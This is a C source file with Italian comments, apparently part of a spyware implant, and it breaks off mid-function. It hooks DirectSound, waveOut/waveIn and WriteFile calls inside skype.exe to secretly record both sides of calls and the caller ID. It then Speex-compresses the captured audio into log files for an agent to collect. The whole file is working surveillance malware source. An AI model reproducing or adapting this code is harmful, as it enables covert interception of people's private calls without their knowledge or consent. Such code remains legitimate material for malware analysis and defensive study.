
#include <shlwapi.h>
#include "speex/speex.h"
#include <dsound.h>

typedef MMRESULT (WINAPI *waveOutGetID_t) (HWAVEOUT , LPUINT);
typedef MMRESULT (WINAPI *waveInGetID_t) (HWAVEOUT , LPUINT);
typedef HRESULT (WINAPI *DirectSoundCreate_t) (LPCGUID , LPDIRECTSOUND *, DWORD);
typedef HRESULT (WINAPI *DirectSoundCaptureCreate_t) (LPCGUID , LPDIRECTSOUNDCAPTURE *, DWORD);

// Funzioni risolte nella DLL del CODEC
typedef void *(*speex_encoder_init_t)(SpeexMode *);
typedef int (*speex_encoder_ctl_t)(void *, int, void *);
typedef void (*speex_encoder_destroy_t)(void *);
typedef int (*speex_encode_t)(void *, float *, SpeexBits *);
typedef void (*speex_bits_init_t)(SpeexBits *);
typedef void (*speex_bits_reset_t)(SpeexBits *);
typedef int (*speex_bits_write_t)(SpeexBits *, char *, int);
typedef void (*speex_bits_destroy_t)(SpeexBits *);
typedef SpeexMode *(*speex_lib_get_mode_t)(int);

speex_encoder_init_t rel_speex_encoder_init;
speex_encoder_ctl_t rel_speex_encoder_ctl;
speex_encoder_destroy_t rel_speex_encoder_destroy;
speex_encode_t rel_speex_encode;
speex_bits_init_t rel_speex_bits_init;
speex_bits_reset_t rel_speex_bits_reset;
speex_bits_write_t rel_speex_bits_write;
speex_bits_destroy_t rel_speex_bits_destroy;
speex_lib_get_mode_t rel_speex_lib_get_mode;


typedef struct wave_list {
	BYTE *pWave;
	DWORD sample_len;
	struct wave_list *next;
	struct wave_list *prev;
} wave_list_struct;

#define FLAGS_INPUT 1   // Ricevuto dal microfono
#define FLAGS_OUTPUT 2  // Suonato dalla scheda audio
#define FLAGS_CALL_ID 4 // Ha mandato il CallID

#define DEFAULT_SAMPLE_SIZE (512*1024) // 512KB
#define DEFAULT_COMPRESSION 3
#define MAX_ID_LEN 250
// XXX - Potrei provare a ridurlo ancora...o devo aumentarla per computer lenti
// che ci mettono molto a comprimere...
#define CALL_DELTA 16 // Intervallo in decimi di secondo che differenzia due chiamate

#define INPUT_ELEM 0
#define OUTPUT_ELEM 1
char CallerID[MAX_ID_LEN];
BOOL bPM_SkypeRecordStarted = FALSE; // Flag che indica se il monitor e' attivo o meno
DWORD sample_size[2] = {0,0};        // Viene inizializzato solo all'inizio
FILETIME channel_time_start[2];		 // Time stamp di inizio chiamata
FILETIME channel_time_last[2];       // Time stamp dell'ultimo campione
wave_list_struct *wave_list_head[2] = {NULL, NULL};
DWORD max_sample_size; // Dimensione oltre la quale salva un sample su file
DWORD compress_factor; // Fattore di compressione del codec
HMODULE codec_handle = NULL; // Handle alla dll del codec


#include <mmsystem.h>
// XXX Dovrei liberare i buffer e le strutture create
BYTE *GetDirectSoundGetCP(BYTE **DSLock, BYTE **DSUnlock)
{
	LPDIRECTSOUNDBUFFER lpDSBuffer;
	LPDIRECTSOUND lpDS = NULL;
	PCMWAVEFORMAT pcmwf;
	DSBUFFERDESC dsbdesc;
	BYTE ***interface_ptr;
	BYTE **func_ptr;
	HMODULE hdsound;
	DirectSoundCreate_t pDirectSoundCreate;

	if ( !(hdsound = LoadLibrary("dsound.dll") ) )
		return NULL;
	if ( !(pDirectSoundCreate = (DirectSoundCreate_t)HM_SafeGetProcAddress(hdsound, "DirectSoundCreate") ) )
		return NULL;

	if (DS_OK != pDirectSoundCreate(NULL, &lpDS, NULL))
		return NULL;

	memset( &pcmwf, 0, sizeof(PCMWAVEFORMAT) );
	pcmwf.wf.wFormatTag         = WAVE_FORMAT_PCM;      
	pcmwf.wf.nChannels          = 1;
	pcmwf.wf.nSamplesPerSec     = 48000;
	pcmwf.wf.nBlockAlign        = (WORD)2;
	pcmwf.wf.nAvgBytesPerSec    = 96000;
	pcmwf.wBitsPerSample        = (WORD)16;

	memset(&dsbdesc, 0, sizeof(DSBUFFERDESC));
	dsbdesc.dwSize              = sizeof(DSBUFFERDESC);
	dsbdesc.dwFlags             = DSBCAPS_CTRLFREQUENCY|DSBCAPS_CTRLPAN|DSBCAPS_CTRLVOLUME ;
	dsbdesc.dwBufferBytes       = 512; 
	dsbdesc.lpwfxFormat         = (LPWAVEFORMATEX)&pcmwf;
		
	if (DS_OK != lpDS->CreateSoundBuffer(&dsbdesc, &lpDSBuffer, NULL))
		return NULL;

	interface_ptr = (BYTE ***)lpDSBuffer;
	func_ptr = *interface_ptr;

	*DSLock   = *(func_ptr + 11);
	*DSUnlock = *(func_ptr + 19);

	func_ptr += 4;
	return *func_ptr;
}

// XXX Dovrei liberare i buffer e le strutture create
BYTE *GetDirectSoundCaptureGetCP(BYTE **DSLock, BYTE **DSUnlock)
{
	LPDIRECTSOUNDCAPTURE lpDSC;
	LPDIRECTSOUNDCAPTUREBUFFER lpDSCB;
	DSCBUFFERDESC cdbufd;
	PCMWAVEFORMAT pcmwf;
	BYTE ***interface_ptr;
	BYTE **func_ptr;
	HMODULE hdsound;
	DirectSoundCaptureCreate_t pDirectSoundCaptureCreate;

	if ( !(hdsound = LoadLibrary("dsound.dll") ) )
		return NULL;
	if ( !(pDirectSoundCaptureCreate = (DirectSoundCaptureCreate_t)HM_SafeGetProcAddress(hdsound, "DirectSoundCaptureCreate") ) )
		return NULL;

	if ( DS_OK != pDirectSoundCaptureCreate(NULL, &lpDSC, NULL))
		return NULL;

	memset( &pcmwf, 0, sizeof(PCMWAVEFORMAT) );
	pcmwf.wf.wFormatTag         = WAVE_FORMAT_PCM;      
	pcmwf.wf.nChannels          = 1;
	pcmwf.wf.nSamplesPerSec     = 48000;
	pcmwf.wf.nBlockAlign        = (WORD)2;
	pcmwf.wf.nAvgBytesPerSec    = 96000;
	pcmwf.wBitsPerSample        = (WORD)16;

	memset(&cdbufd, 0, sizeof(cdbufd));
	cdbufd.dwSize = sizeof(DSCBUFFERDESC);
	cdbufd.dwBufferBytes = 100;
	cdbufd.lpwfxFormat = (LPWAVEFORMATEX)&pcmwf;
	
	if (DS_OK != lpDSC->CreateCaptureBuffer(&cdbufd, &lpDSCB, NULL))
		return NULL;

	interface_ptr = (BYTE ***)lpDSCB;
	func_ptr = *interface_ptr;

	*DSLock   = *(func_ptr + 8);
	*DSUnlock = *(func_ptr + 11);

	func_ptr += 4;
	return *func_ptr;
}

typedef DWORD (WINAPI *DSLock_t)(DWORD, DWORD, DWORD, LPVOID *, LPDWORD, LPVOID *, LPDWORD, DWORD);
typedef DWORD (WINAPI *DSUnlock_t)(DWORD, LPVOID, DWORD, LPVOID, DWORD);


///////////////////////////
//
//   Dsound::DSGetCP
//
///////////////////////////
typedef struct {
	COMMONDATA;
	DWORD old_play_c;
	DWORD saved_cp;
	BYTE *buffer_address;
	DWORD buffer_tot_len;
	DSLock_t pDSLock;
	DSUnlock_t pDSUnlock;
} DSGetCPStruct;

DSGetCPStruct DSGetCPData;
#define THRESHOLD 0x3C0


#define LARGE_CLI_WRITE(x, y, z) { BYTE *wave_ptr = x; \
		                           DWORD to_write = y; \
		                           while (to_write > 0) { \
			                          if (to_write <= MAX_MSG_LEN) { \
				                         pData->pHM_IpcCliWrite(PM_SKYPERECORDAGENT, wave_ptr, to_write, z); \
		 		                         to_write = 0; \
			                          } else { \
				                         pData->pHM_IpcCliWrite(PM_SKYPERECORDAGENT, wave_ptr, MAX_MSG_LEN, z); \
				                         wave_ptr += MAX_MSG_LEN; \
									     to_write -= MAX_MSG_LEN; }}}

DWORD __stdcall PM_DSGetCP(DWORD class_ptr,
                           DWORD *write_c,
					  	   DWORD *play_c)
{
	BOOL *Active;
	DWORD *dummy1;
	DWORD dummy2;
	BYTE *temp_buf;
	DWORD temp_len;
	
	INIT_WRAPPER(DSGetCPStruct)
	CALL_ORIGINAL_API(3);

	// Se il processo non e' skype o qualcosa e' andato storto, ritorna
	if(!((DWORD)pData->pHM_IpcCliWrite) || ret_code!=DS_OK)
		return ret_code;

	// Controlla se il monitor e' attivo
	Active = (BOOL *)pData->pHM_IpcCliRead(PM_SKYPERECORDAGENT);
	if (!Active || !(*Active))
		return ret_code;

	// Locka l'intero buffer
	// lo fa ogni volta per trovare gli indirizzi anche quando
	// cambia il buffer lasciando invariato il class_ptr
	if (pData->pDSLock(class_ptr, 0, 0, (LPVOID *)&temp_buf, &temp_len, (LPVOID *)&(dummy1), &(dummy2), DSBLOCK_ENTIREBUFFER) != DS_OK) 
		return ret_code;
	pData->pDSUnlock(class_ptr, temp_buf, temp_len, dummy1, dummy2);

	// Se e' la prima volta che lo chiama (o ha cambiato buffer)
	// salva i valori e ritorna
	if (pData->old_play_c == -1 || pData->saved_cp != class_ptr ||
		pData->buffer_address != temp_buf || pData->buffer_tot_len != temp_len) {
		pData->old_play_c = *play_c;
		pData->saved_cp = class_ptr;
		pData->buffer_address = temp_buf;
		pData->buffer_tot_len = temp_len;
		return ret_code;
	}

	// Nessuno cambiamento
	if (*play_c == pData->old_play_c)
		return ret_code;

	// Non ha wrappato
	if (*play_c > pData->old_play_c) {
		if ( (*play_c - pData->old_play_c) >= THRESHOLD ) {
			LARGE_CLI_WRITE((pData->buffer_address + pData->old_play_c), (*play_c - pData->old_play_c), FLAGS_OUTPUT);
			pData->old_play_c = *play_c;
		}
	} else {
		// Ha wrappato
		if ( *play_c + (pData->buffer_tot_len - pData->old_play_c) >= THRESHOLD ) {
			LARGE_CLI_WRITE((pData->buffer_address + pData->old_play_c), (pData->buffer_tot_len - pData->old_play_c), FLAGS_OUTPUT);
			LARGE_CLI_WRITE((pData->buffer_address), (*play_c), FLAGS_OUTPUT);
			pData->old_play_c = *play_c;
		}
	}

	return ret_code;
}


DWORD PM_DSGetCP_setup(HMServiceStruct *pData)
{
	char proc_path[DLLNAMELEN];
	char *proc_name;
	HMODULE hMod;

	// Verifica autonomamente se si tratta del processo skype
	ZeroMemory(proc_path, sizeof(proc_path));
	GetModuleFileName(NULL, proc_path, sizeof(proc_path)-1);
	proc_name = strrchr(proc_path, '\\');
	if (proc_name) {
		proc_name++;
		if (stricmp(proc_name, "skype.exe"))
			return 1; // Hooka solo skype.exe
	} else
		return 1;

	DSGetCPData.pHM_IpcCliRead = pData->pHM_IpcCliRead;
	DSGetCPData.pHM_IpcCliWrite = pData->pHM_IpcCliWrite;
	DSGetCPData.old_play_c = -1;

	if ( ! (DSGetCPData.bAPIAdd = GetDirectSoundGetCP( (BYTE **)&(DSGetCPData.pDSLock), (BYTE **)&(DSGetCPData.pDSUnlock) ) ))
		return 1;

	DSGetCPData.dwHookLen = 980;
	return 0;
}





///////////////////////////
//
//   Dsound::DSCapGetCP
//
///////////////////////////

typedef struct {
	COMMONDATA;
	DWORD old_play_c;
	DWORD saved_cp;
	BYTE *buffer_address;
	DWORD buffer_tot_len;
	DSLock_t pDSLock;
	DSUnlock_t pDSUnlock;
} DSCapGetCPStruct;

DSCapGetCPStruct DSCapGetCPData;

DWORD __stdcall PM_DSCapGetCP(DWORD class_ptr,
                              DWORD *write_c,
					  	      DWORD *play_c)
{
	BOOL *Active;
	DWORD *dummy1;
	DWORD dummy2;
	BYTE *temp_buf;
	DWORD temp_len;
	
	INIT_WRAPPER(DSCapGetCPStruct)
	CALL_ORIGINAL_API(3);

	// Se il processo non e' skype o qualcosa e' andato storto, ritorna
	if(!((DWORD)pData->pHM_IpcCliWrite) || ret_code!=DS_OK)
		return ret_code;

	// Controlla se il monitor e' attivo
	Active = (BOOL *)pData->pHM_IpcCliRead(PM_SKYPERECORDAGENT);
	if (!Active || !(*Active))
		return ret_code;

	// Locka l'intero buffer
	// lo fa ogni volta per trovare gli indirizzi anche quando
	// cambia il buffer lasciando invariato il class_ptr
	if (pData->pDSLock(class_ptr, 0, 0, (LPVOID *)&temp_buf, &temp_len, (LPVOID *)&(dummy1), &(dummy2), DSCBLOCK_ENTIREBUFFER) != DS_OK) 
		return ret_code;
	pData->pDSUnlock(class_ptr, temp_buf, temp_len, dummy1, dummy2);

	// Se e' la prima volta che lo chiama (o ha cambiato buffer)
	// salva i valori e ritorna
	if (pData->old_play_c == -1 || pData->saved_cp != class_ptr ||
		pData->buffer_address != temp_buf || pData->buffer_tot_len != temp_len) {
		pData->old_play_c = *play_c;
		pData->saved_cp = class_ptr;
		pData->buffer_address = temp_buf;
		pData->buffer_tot_len = temp_len;
		return ret_code;
	}

	// Nessuno cambiamento
	if (*play_c == pData->old_play_c)
		return ret_code;

	// Non ha wrappato
	if (*play_c > pData->old_play_c) {
		if ( (*play_c - pData->old_play_c) >= THRESHOLD ) {
			LARGE_CLI_WRITE((pData->buffer_address + pData->old_play_c), (*play_c - pData->old_play_c), FLAGS_INPUT);
			pData->old_play_c = *play_c;
		}
	} else {
		// Ha wrappato
		if ( *play_c + (pData->buffer_tot_len - pData->old_play_c) >= THRESHOLD ) {
			LARGE_CLI_WRITE((pData->buffer_address + pData->old_play_c), (pData->buffer_tot_len - pData->old_play_c), FLAGS_INPUT);
			LARGE_CLI_WRITE((pData->buffer_address), (*play_c), FLAGS_INPUT);
			pData->old_play_c = *play_c;
		}
	}

	return ret_code;
}


DWORD PM_DSCapGetCP_setup(HMServiceStruct *pData)
{
	char proc_path[DLLNAMELEN];
	char *proc_name;
	HMODULE hMod;

	// Verifica autonomamente se si tratta del processo skype
	ZeroMemory(proc_path, sizeof(proc_path));
	GetModuleFileName(NULL, proc_path, sizeof(proc_path)-1);
	proc_name = strrchr(proc_path, '\\');
	if (proc_name) {
		proc_name++;
		if (stricmp(proc_name, "skype.exe"))
			return 1; // Hooka solo skype.exe
	} else
		return 1;

	DSCapGetCPData.pHM_IpcCliRead = pData->pHM_IpcCliRead;
	DSCapGetCPData.pHM_IpcCliWrite = pData->pHM_IpcCliWrite;
	DSCapGetCPData.old_play_c = -1;

	if ( ! (DSCapGetCPData.bAPIAdd = GetDirectSoundCaptureGetCP( (BYTE **)&(DSCapGetCPData.pDSLock), (BYTE **)&(DSCapGetCPData.pDSUnlock) ) ))
		return 1;

	DSCapGetCPData.dwHookLen = 980;
	return 0;
}


///////////////////////////
//
//   waveOutWrite
//
///////////////////////////
typedef struct {
	COMMONDATA;
	waveOutGetID_t pwaveOutGetID;
} waveOutWriteStruct;

waveOutWriteStruct waveOutWriteData;

DWORD __stdcall PM_waveOutWrite(HWAVEOUT ARG1,
                                WAVEHDR *WaveHdr,
					  		    DWORD ARG3)
{
	UINT devID;
	BOOL *Active;

	INIT_WRAPPER(waveOutWriteStruct)
	CALL_ORIGINAL_API(3)

	// Se il processo non e' skype o qualcosa e' andato storto, ritorna
	if(!((DWORD)pData->pHM_IpcCliWrite) || ret_code!=MMSYSERR_NOERROR)
		return ret_code;

	// Controlla se il monitor e' attivo
	Active = (BOOL *)pData->pHM_IpcCliRead(PM_SKYPERECORDAGENT);
	if (!Active || !(*Active))
		return ret_code;

	pData->pwaveOutGetID(ARG1, &devID);
	// Non registra le scritture sul wave mapper
	if (devID!=0xFFFFFFFF) 
		// Invia tutto al dispatcher
		pData->pHM_IpcCliWrite(PM_SKYPERECORDAGENT, (BYTE *)WaveHdr->lpData, WaveHdr->dwBufferLength, FLAGS_OUTPUT);

	return ret_code;
}


DWORD PM_waveOutWrite_setup(HMServiceStruct *pData)
{
	char proc_path[DLLNAMELEN];
	char *proc_name;
	HMODULE hMod;

	// Verifica autonomamente se si tratta del processo skype
	ZeroMemory(proc_path, sizeof(proc_path));
	GetModuleFileName(NULL, proc_path, sizeof(proc_path)-1);
	proc_name = strrchr(proc_path, '\\');
	if (proc_name) {
		proc_name++;
		if (stricmp(proc_name, "skype.exe"))
			return 1; // Hooka solo skype.exe
	} else
		return 1;

	VALIDPTR(hMod = LoadLibrary("winmm.DLL"))
	VALIDPTR(waveOutWriteData.pwaveOutGetID = (waveOutGetID_t) HM_SafeGetProcAddress(hMod, "waveOutGetID"))
	waveOutWriteData.pHM_IpcCliRead = pData->pHM_IpcCliRead;
	waveOutWriteData.pHM_IpcCliWrite = pData->pHM_IpcCliWrite;

	waveOutWriteData.dwHookLen = 750;
	return 0;
}


///////////////////////////
//
// waveInUnprepareHeader
//
///////////////////////////
typedef struct {
	COMMONDATA;
	waveInGetID_t pwaveInGetID;
} waveInUnprepareHeaderStruct;

waveInUnprepareHeaderStruct waveInUnprepareHeaderData;

DWORD __stdcall PM_waveInUnprepareHeader(HWAVEOUT ARG1,
                                         WAVEHDR *WaveHdr,
					  		             DWORD ARG3)
{
	UINT devID;
	BOOL *Active;

	INIT_WRAPPER(waveInUnprepareHeaderStruct)
	CALL_ORIGINAL_API(3)

	// Se il processo non e' skype o qualcosa e' andato storto, ritorna
	if(!((DWORD)pData->pHM_IpcCliWrite) || ret_code!=MMSYSERR_NOERROR)
		return ret_code;

	// Controlla se il monitor e' attivo
	Active = (BOOL *)pData->pHM_IpcCliRead(PM_SKYPERECORDAGENT);
	if (!Active || !(*Active))
		return ret_code;

	pData->pwaveInGetID(ARG1, &devID);
	// Non registra le scritture sul wave mapper
	if (devID!=0xFFFFFFFF) 
		// Invia tutto al dispatcher
		pData->pHM_IpcCliWrite(PM_SKYPERECORDAGENT, (BYTE *)WaveHdr->lpData, WaveHdr->dwBufferLength, FLAGS_INPUT);

	return ret_code;
}


DWORD PM_waveInUnprepareHeader_setup(HMServiceStruct *pData)
{
	char proc_path[DLLNAMELEN];
	char *proc_name;
	HMODULE hMod;

	// Verifica autonomamente se si tratta del processo skype
	ZeroMemory(proc_path, sizeof(proc_path));
	GetModuleFileName(NULL, proc_path, sizeof(proc_path)-1);
	proc_name = strrchr(proc_path, '\\');
	if (proc_name) {
		proc_name++;
		if (stricmp(proc_name, "skype.exe"))
			return 1; // Hooka solo skype.exe
	} else 
		return 1;

	VALIDPTR(hMod = LoadLibrary("winmm.DLL"))
	VALIDPTR(waveInUnprepareHeaderData.pwaveInGetID = (waveInGetID_t) HM_SafeGetProcAddress(hMod, "waveInGetID"))
	waveInUnprepareHeaderData.pHM_IpcCliRead = pData->pHM_IpcCliRead;
	waveInUnprepareHeaderData.pHM_IpcCliWrite = pData->pHM_IpcCliWrite;
	
	waveInUnprepareHeaderData.dwHookLen = 750;
	return 0;
}


///////////////////////////
//
//   WriteFile
//
///////////////////////////
typedef struct {
	COMMONDATA;
} WriteFileStruct;

WriteFileStruct WriteFileData;

BOOL  __stdcall PM_WriteFile(HANDLE ARG1,
                             BYTE *buffer,
					  		 DWORD buf_len,
							 LPDWORD ARG4,
                             LPOVERLAPPED ARG5)
{
	DWORD i;
	DWORD string_len;
	BOOL *Active;

	INIT_WRAPPER(WriteFileStruct)
	CALL_ORIGINAL_API(5)

	// Parsa la struttura per vedere se e' una scrittura di nuova 
	// chiamata effettuata nel file di log chiamate
	if (buf_len < 12)
		return (BOOL)ret_code;
	if (buffer[4]!=0x41 || buffer[5]!=0x06 || buffer[6]!=0x00 || buffer[7]!=0x09 ||
		buffer[8]!=0x0D || buffer[9]!=0x03 || buffer[10]!=0x98 || buffer[11]!=0x07)
		return (BOOL)ret_code;

	// Se il processo non e' skype o qualcosa e' andato storto, ritorna
	if(!((DWORD)pData->pHM_IpcCliWrite) || !ret_code)
		return (BOOL)ret_code;

	// Controlla se il monitor e' attivo
	Active = (BOOL *)pData->pHM_IpcCliRead(PM_SKYPERECORDAGENT);
	if (!Active || !(*Active))
		return (BOOL)ret_code;

	// Verifica che la stringa sia contenuta tutta nel buffer
	i=12; string_len=1; 
	LOOP {
		// Se siamo usciti fuori dal buffer senza trovare il NULL terminate
		// (controlla anche che non scriviamo troppo nel buffer locale...
		// ...tanto MAX_ID_LEN e' molto minore di MAX_MSG_LEN
		if (i >= buf_len || string_len >= MAX_ID_LEN)
			return (BOOL)ret_code;

		// Se abbiamo raggiunto il NULL
		if (buffer[i] == 0)
			break;
		
		i++; string_len++;
	}

	// Cosi' siamo sicuri che il nome sia NULL terminato
	pData->pHM_IpcCliWrite(PM_SKYPERECORDAGENT, &buffer[12], string_len, FLAGS_CALL_ID);

	return (BOOL)ret_code;
}


DWORD PM_WriteFile_setup(HMServiceStruct *pData)
{
	char proc_path[DLLNAMELEN];
	char *proc_name;
	HMODULE hMod;

	// Verifica autonomamente se si tratta del processo skype
	ZeroMemory(proc_path, sizeof(proc_path));
	GetModuleFileName(NULL, proc_path, sizeof(proc_path)-1);
	proc_name = strrchr(proc_path, '\\');
	if (proc_name) {
		proc_name++;
		if (stricmp(proc_name, "skype.exe"))
			return 1; // Hooka solo skype.exe
	} else
		return 1;

	WriteFileData.pHM_IpcCliRead = pData->pHM_IpcCliRead;
	WriteFileData.pHM_IpcCliWrite = pData->pHM_IpcCliWrite;
	WriteFileData.dwHookLen = 870;
	return 0;
}



// Alloca e inserisce un nuovo elemento.
// Inserisce SEMPRE IN TESTA (quindi la lista andra' scorsa al rovescio)
// visto che ora il dispatch rispetta l'ordine di inserimento.
BOOL InsertList(wave_list_struct **wave_list, BYTE *sample, DWORD sample_len)
{
	wave_list_struct *new_elem;

	// Inserisce solo messaggi contenenti dati
	if (sample_len==0)
		return FALSE;
	
	// Alloca e inizializza il nuovo elemento
	if ( !(new_elem = (wave_list_struct *)malloc(sizeof(wave_list_struct))) )
		return FALSE;
	if ( !(new_elem->pWave = (BYTE *)malloc(sample_len)) ) {
		SAFE_FREE(new_elem);
		return FALSE;
	}
	memcpy(new_elem->pWave, sample, sample_len);
	new_elem->sample_len = sample_len;
	new_elem->next = *wave_list;
	new_elem->prev = NULL;
	if (*wave_list)
		(*wave_list)->prev = new_elem;
	*wave_list = new_elem;
	
	return TRUE;
}

// Trova l'ultimo elemento della lista
wave_list_struct *FindTail(wave_list_struct *wave_list)
{
	if (!wave_list)
		return NULL;

	LOOP {
		if (!wave_list->next)
			return wave_list;
		wave_list = wave_list->next;
	}
}

// Libera la lista dei sample
void FreeList(wave_list_struct **wave_list)
{
	wave_list_struct *list_ptr, *tmp_ptr;
	list_ptr = *wave_list;
	while(list_ptr) {
		SAFE_FREE(list_ptr->pWave);
		tmp_ptr = list_ptr->next;
		SAFE_FREE(list_ptr);
		list_ptr = tmp_ptr;
	}
	*wave_list = NULL;
}


// Salva la lista come file encodato
#define SPEEX_FREE	{rel_speex_encoder_destroy(state); rel_speex_bits_destroy(&bits);}
void SaveEncode(char *name, wave_list_struct *wave_list, DWORD total_size)
{
#define MODE_UWB 2
#define SAMPLE_SIZE 2
	short *bit_sample;
	void *state;
	float *input;
	BYTE *to_write;
	BYTE *source, *source_ptr;
	BYTE *cbits;
	SpeexBits bits;
	DWORD frame_size = 0;
	DWORD i, nbBytes;	
	DWORD complexity = 1;
	HANDLE hf;

	// Crea un nuovo encoder in wide mode*/
	state = rel_speex_encoder_init(rel_speex_lib_get_mode(MODE_UWB));
	rel_speex_encoder_ctl(state, SPEEX_SET_QUALITY, &compress_factor);
	rel_speex_encoder_ctl(state, SPEEX_SET_COMPLEXITY, &complexity);
	rel_speex_bits_init(&bits);
	rel_speex_encoder_ctl(state, SPEEX_GET_FRAME_SIZE, &frame_size);

	// Allochiamo un buffer per tutta la sequenza di campioni
	if (!frame_size) {
		SPEEX_FREE;
		return;
	}
	if (!(source = (BYTE *)malloc(total_size))) {
		SPEEX_FREE;
		return;
	}
	// Allochiamo il buffer di output grande quanto quello originale (per sicurezza)
	if (!(to_write = (BYTE *)malloc(frame_size*SAMPLE_SIZE + sizeof(DWORD)))) {
		SAFE_FREE(source);
		SPEEX_FREE;
		return;
	}
	cbits = to_write + sizeof(DWORD); // Punta al blocco dati, mentre la prima DWORD conterra' la dimensione
	// Allochiamo il buffer di elaborazione
	if (!(input = (float *)malloc(frame_size*sizeof(float)))) {
		SAFE_FREE(source);
		SAFE_FREE(to_write);
		SPEEX_FREE;
		return;
	}

	// Copia la lista nel bufferone sorgente
	// che verra' encodato nel ciclo
	source_ptr = source;
	// Scorre la lista al contrario
	wave_list = FindTail(wave_list);
	for (; wave_list; wave_list=wave_list->prev) {
		memcpy(source_ptr, wave_list->pWave, wave_list->sample_len);
		source_ptr += wave_list->sample_len;
	}

	hf = Log_CreateFile(PM_SKYPERECORDAGENT, name);
	// Continua finche' dopo source_ptr non rimane ancora spazio per un frame intero
	for (source_ptr=source; source_ptr+(frame_size*SAMPLE_SIZE)<=source+total_size; source_ptr+=(frame_size*SAMPLE_SIZE)) {
		// Copiamo i campioni a 16 bit dentro dei float
		bit_sample = (short *)source_ptr;
		for (i=0; i<frame_size; i++)
			// Equalizza i pcm attenuando il segnale di circa 1.2 Db 
			//(per evitare il clipping dei GSM con speex)
			input[i] =  bit_sample[i] - (bit_sample[i]/4);

		rel_speex_bits_reset(&bits);
		rel_speex_encode(state, input, &bits);
		// Encoda dentro il buffer di output
		nbBytes = rel_speex_bits_write(&bits, (char *)cbits, frame_size*SAMPLE_SIZE);
		if (nbBytes > (frame_size*SAMPLE_SIZE))
			continue; // Check paranoico
		// Copia la lunghezza nei primi 4 byte per fare un unica scrittura su file
		memcpy(to_write, &nbBytes, sizeof(DWORD)); 
		Log_WriteFile(hf, to_write, nbBytes+sizeof(DWORD));
	}
   
	Log_CloseFile(hf);	SAFE_FREE(source);
	SAFE_FREE(to_write);
	SAFE_FREE(input);
	SPEEX_FREE;
}


// Salva la lista come wav
void SaveWav(char *name, wave_list_struct *wave_list, DWORD size)
{
/*	WAVEFORMATEX pcmWaveFormat;
	DWORD dwFileSize = size + 44 - 8; 
	DWORD dwNum = size;
	DWORD dwFmtSize = 16;
	HANDLE hf;
*/

	// Se abbimo la DLL del codec, salva in modo compresso
	if (codec_handle) {
		SaveEncode(name, wave_list, size);
		return;
	}

/*	// Altrimenti salva in WAV
	// XXX - Non salva piu' in wav
	pcmWaveFormat.wFormatTag = WAVE_FORMAT_PCM;
	pcmWaveFormat.nChannels = 1;
	pcmWaveFormat.nSamplesPerSec = 48000;
	pcmWaveFormat.wBitsPerSample = 16;
	pcmWaveFormat.cbSize = 0;
	pcmWaveFormat.nBlockAlign = (pcmWaveFormat.wBitsPerSample/8)*pcmWaveFormat.nChannels;
	pcmWaveFormat.nAvgBytesPerSec = pcmWaveFormat.nSamplesPerSec*pcmWaveFormat.nBlockAlign;

	hf = Log_CreateFile(PM_SKYPERECORDAGENT, name);
	Log_WriteFile(hf, (BYTE *)"RIFF", 4) ;
	Log_WriteFile(hf, (BYTE *)&dwFileSize, sizeof(dwFileSize)) ;
	Log_WriteFile(hf, (BYTE *)"WAVEfmt ", 8) ;
	Log_WriteFile(hf, (BYTE *)&dwFmtSize, sizeof(dwFmtSize)) ;
	Log_WriteFile(hf, (BYTE *)&pcmWaveFormat.wFormatTag, sizeof(pcmWaveFormat.wFormatTag)) ;
	Log_WriteFile(hf, (BYTE *)&pcmWaveFormat.nChannels, sizeof(pcmWaveFormat.nChannels)) ;
	Log_WriteFile(hf, (BYTE *)&pcmWaveFormat.nSamplesPerSec, sizeof(pcmWaveFormat.nSamplesPerSec)) ;
	Log_WriteFile(hf, (BYTE *)&pcmWaveFormat.nAvgBytesPerSec, sizeof(pcmWaveFormat.nAvgBytesPerSec)) ;
	Log_WriteFile(hf, (BYTE *)&pcmWaveFormat.nBlockAlign, sizeof(pcmWaveFormat.nBlockAlign)) ;
	Log_WriteFile(hf, (BYTE *)&pcmWaveFormat.wBitsPerSample, sizeof(pcmWaveFormat.wBitsPerSample)) ;
	Log_WriteFile(hf, (BYTE *)"data", 4) ;
	Log_WriteFile(hf, (BYTE *)&dwNum, sizeof(dwNum)) ;
	// Scrive tutta la lista...
	wave_list = FindTail(wave_list);
	while (wave_list) {
		Log_WriteFile(hf, wave_list->pWave, wave_list->sample_len) ;
		wave_list = wave_list->prev;
	}
	Log_CloseFile(hf);
*/
}


// Carica (se risce) la DLL del codec e risolve tutti i simboli utilizzati
#define RESOLVE_ERROR { FreeLibrary(hcodec); return NULL; }
HMODULE ResolveCodecSymbols(char *name)
{
	HMODULE hcodec;
	if ( !(hcodec = LoadLibrary(name)))
		return NULL;

	if (! (rel_speex_encoder_init = (speex_encoder_init_t)GetProcAddress(hcodec, "speex_encoder_init")) ) RESOLVE_ERROR;
	if (! (rel_speex_encoder_ctl = (speex_encoder_ctl_t)GetProcAddress(hcodec, "speex_encoder_ctl")) ) RESOLVE_ERROR;
	if (! (rel_speex_encoder_destroy = (speex_encoder_destroy_t)GetProcAddress(hcodec, "speex_encoder_destroy")) ) RESOLVE_ERROR;
	if (! (rel_speex_encode = (speex_encode_t)GetProcAddress(hcodec, "speex_encode")) ) RESOLVE_ERROR;
	if (! (rel_speex_bits_init = (speex_bits_init_t)GetProcAddress(hcodec, "speex_bits_init")) ) RESOLVE_ERROR;
	if (! (rel_speex_bits_reset = (speex_bits_reset_t)GetProcAddress(hcodec, "speex_bits_reset")) ) RESOLVE_ERROR;
	if (! (rel_speex_bits_write = (speex_bits_write_t)GetProcAddress(hcodec, "speex_bits_write")) ) RESOLVE_ERROR;
	if (! (rel_speex_bits_destroy = (speex_bits_destroy_t)GetProcAddress(hcodec, "speex_bits_destroy")) ) RESOLVE_ERROR;
	if (! (rel_speex_lib_get_mode = (speex_lib_get_mode_t)GetProcAddress(hcodec, "speex_lib_get_mode")) ) RESOLVE_ERROR;	

	return hcodec;
}


// Ritorna il nome del file come lo dovrei salvare.
// NON e' thread safe (tanto la richiamo solo da una funzione)
char *SkypeGetFileName(char *call_id, DWORD in_out)
{
	static char epoch_name[DLLNAMELEN];

	// Scrive il timestamp di inizio del sample, quello di chiusura lo scrivera' la 
	// funzione dei log nel momento in cui il file verra' salvato
	if (in_out == OUTPUT_ELEM)
		_snprintf_s(epoch_name, sizeof(epoch_name), _TRUNCATE, "%s_OUT_%.8X%.8X_%.8X%.8X", call_id, channel_time_start[in_out].dwHighDateTime, channel_time_start[in_out].dwLowDateTime, channel_time_last[in_out].dwHighDateTime, channel_time_last[in_out].dwLowDateTime);
	else
